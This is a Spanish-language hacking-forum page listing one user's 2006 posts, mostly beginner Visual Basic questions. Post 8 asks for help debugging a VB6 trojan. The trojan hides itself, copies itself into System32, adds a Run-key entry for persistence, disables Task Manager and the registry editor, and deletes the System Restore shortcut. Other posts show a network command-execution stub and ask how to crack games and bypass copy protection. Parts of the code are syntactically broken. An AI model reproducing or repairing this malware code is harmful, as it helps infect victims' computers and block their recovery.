elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Mensajes
Páginas: [1] 2
1  Comunicaciones / Hacking Mobile / Re: Conferencia Bluetooth Hacking @ Hackmeeting06 en: 23 Octubre 2006, 10:29 am
no està el video completo?
2  Programación / Programación Visual Basic / duda en un codigo vb en: 22 Agosto 2006, 18:51 pm
hola tengo una duda en este codigo.
Private Sub WS_DataArrival(ByVal bytesTotal As Long)                        'en la llegada de datos
On Error GoTo Error
dim datos as string
ws.getdata datos          'metemos en la variable datos los datos que nos lleguen
if datos = "paint" then shell ("mspaint")                    ' si los datos eran = a "paint" entonces ejecuta el paint
end sub

me dice label not defined
3  Programación / Programación Visual Basic / Re: donde està el boton cmdok? en: 22 Agosto 2006, 15:52 pm
ok gracias disculpen por la pregunta de principiante.
4  Programación / Programación Visual Basic / donde està el boton cmdok? en: 22 Agosto 2006, 15:40 pm
hola no encuentro donde està el boton cmdok en visual basic 6.0 alguno me puede ayudar?
5  Programación / Programación Visual Basic / Re: que hago mal? en: 11 Agosto 2006, 15:19 pm
ha ok muuchas gracias
6  Programación / Programación Visual Basic / Re: que hago mal? en: 11 Agosto 2006, 15:07 pm
hola warghost estoy leyendo tu manual de programacion de troyanos en vb6.pero no entiendo una cosa como creo el server?por que yo hice todo como està escrito en el manual pero no se como crear el server.
7  Programación / Programación Visual Basic / Re: que hago mal? en: 11 Agosto 2006, 14:49 pm
tenes razon y acà que ago mal?
Shell "reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword
/d ""1"" /f"
8  Programación / Programación Visual Basic / que ago mal? en: 11 Agosto 2006, 14:44 pm
Private Sub Timer1_Timer()
App.Taskvisible = False
Filecopy App.Path & "\" & App.EXEname & ".exe" C:\Windows\System32\trojan.exe
Set residencia = CreateObject("WScript.Shell")
residencia.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "trojan",
"C:\Windows\System32\" & "\trojan.exe"
Shell "reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword
/d ""1"" /f"
Kill "C:\Documents and Settings\All Users\Menú Inicio\Programas\Accesorios\Herramientas del sistema\Restaurar
sistema.lnk"
Shell "reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disabletaskmgr /t reg_dword /d
""1"" /f"
Timer1.Enabled = False

en esta linea de codigo me da error:Filecopy App.Path & "\" & App.EXEname & ".exe" C:\Windows\System32\trojan.exe


y me da algunos errores mas que puede ser?
9  Media / Juegos y Consolas / flatout2 con starforce4 en: 17 Julio 2006, 15:58 pm
vieron que flatout2 usa star force 4?dicen que la nica manera de hacerlo andar es: Burn with Blindwrite 6.0, make sure to use discs with mediacode
DaxonD42,Philips041,INFODISC-A10-001,TDK601saku, DAXON AZ2,CMC W03.
3. Install.
4. Play from a external USB dvd drive,and make sure Blindwrite 6.0 is
installed on the system you want to use to play. que opinan? miren esto
http://www.metacafe.com/watch/176480/st%20
10  Programación / Ingeniería Inversa / crackear? en: 12 Julio 2006, 21:06 pm
que programas me sirver para crackear un juego?o un programa?
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines